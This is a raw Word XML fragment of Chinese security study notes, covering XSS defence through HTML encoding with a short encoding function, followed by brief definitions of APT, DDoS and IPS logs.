        </w:rPr>
        <w:t>数据内容插入到文档之前，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>应用程序应对提交的数据进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>编码处理，将用户提交的数据中可能存在的各种危险字符和表达式进行过滤以安全的方式插入到文档中进行展现，如可以通过如下函数实现在客户端</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>中执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>编码处理。</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function jsEncode(str)</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 var d = document.createElement('div');</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 d.appendChild(document.createTextNode(str));</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 return d.innerHTML;</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跨站脚本攻击作为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>应用安全领域中最大威胁之一，不仅仅危害</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>应用业务的正常运营，对访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>应用业务的客户端环境和用户也带来了直接安全影响。虽然</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跨站脚本攻击在复杂的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>应用环境中利用方式千变万化，但是</w:t>
      </w:r>
      <w:hyperlink r:id="rId268" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="333333"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
          </w:rPr>
          <w:t>网络安全</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>人员通过对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>应用的各种环境进行详细分析和处理，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>完全阻断</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>跨站脚本攻击是可以实现</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的。如何有效防范和阻止</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跨站脚本攻击，保障</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:hyperlink r:id="rId269" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="333333"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
          </w:rPr>
          <w:t>系统</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的业务安全和正常运营，保护客户端用户免受</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跨站脚本攻击行为的侵害，是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>应用系统管理人员和网络安全产品开发人员的共同职责</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E58FD" w:rsidRPr="00F41A4C" w:rsidRDefault="005E58FD" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005724A2" w:rsidRPr="00F41A4C" w:rsidRDefault="005724A2" w:rsidP="005724A2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">7.4 </w:t>
      </w:r>
      <w:r w:rsidR="00546320" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>APT</w:t>
      </w:r>
      <w:r w:rsidR="00546320" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00546320" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>DDOS</w:t>
      </w:r>
      <w:r w:rsidR="00546320" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00546320" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r w:rsidR="00546320" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00546320" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>IPSLOG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE3328" w:rsidRPr="00F41A4C" w:rsidRDefault="00CE3328" w:rsidP="005D4233">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>信息安全的三要素</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>——“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>保密性</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>完整性</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可用性</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Denial of Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>），即拒绝服务攻击，针对的目标正是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可用性</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94FDD" w:rsidRPr="00F41A4C" w:rsidRDefault="00C94FDD" w:rsidP="005D4233">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>IPS</w:t>
      </w:r>
      <w:r w:rsidR="00947A84" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Log</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>：入侵检测</w:t>
      </w:r>
      <w:r w:rsidR="00A14BF0" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>日志</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D4233" w:rsidRPr="00F41A4C" w:rsidRDefault="004C1031" w:rsidP="005D4233">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>APT</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>：高级持续攻击，进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>长期持续性</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>网络攻击的攻击形式</w:t>
      </w:r>
      <w:r w:rsidR="00A10EBA" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidR="00A84449" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>目的窃取数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10EBA" w:rsidRPr="00F41A4C" w:rsidRDefault="00A10EBA" w:rsidP="005D4233">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>DDOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="004F0BCA" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>将多个计算机联合起来作为攻击平台，对一个或多个目标发动</w:t>
      </w:r>
      <w:r w:rsidR="004F0BCA" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r w:rsidR="004F0BCA" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>攻击，从而成倍地提高拒绝服务攻击的威力。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B2192" w:rsidRPr="00F41A4C" w:rsidRDefault="005B2192" w:rsidP="005D4233">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r w:rsidR="003F1348" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>防御</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB49F6" w:rsidRPr="00F41A4C" w:rsidRDefault="00BB49F6" w:rsidP="005D4233">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB49F6" w:rsidRPr="00F41A4C" w:rsidRDefault="00BB49F6" w:rsidP="00BB49F6">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:after="107" w:line="258" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>对付</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>DDOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>是一个系统工程，想仅仅依靠某种系统或产品防住</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>DDOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>是不现实的，可以肯定的是，完全杜绝</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>DDOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
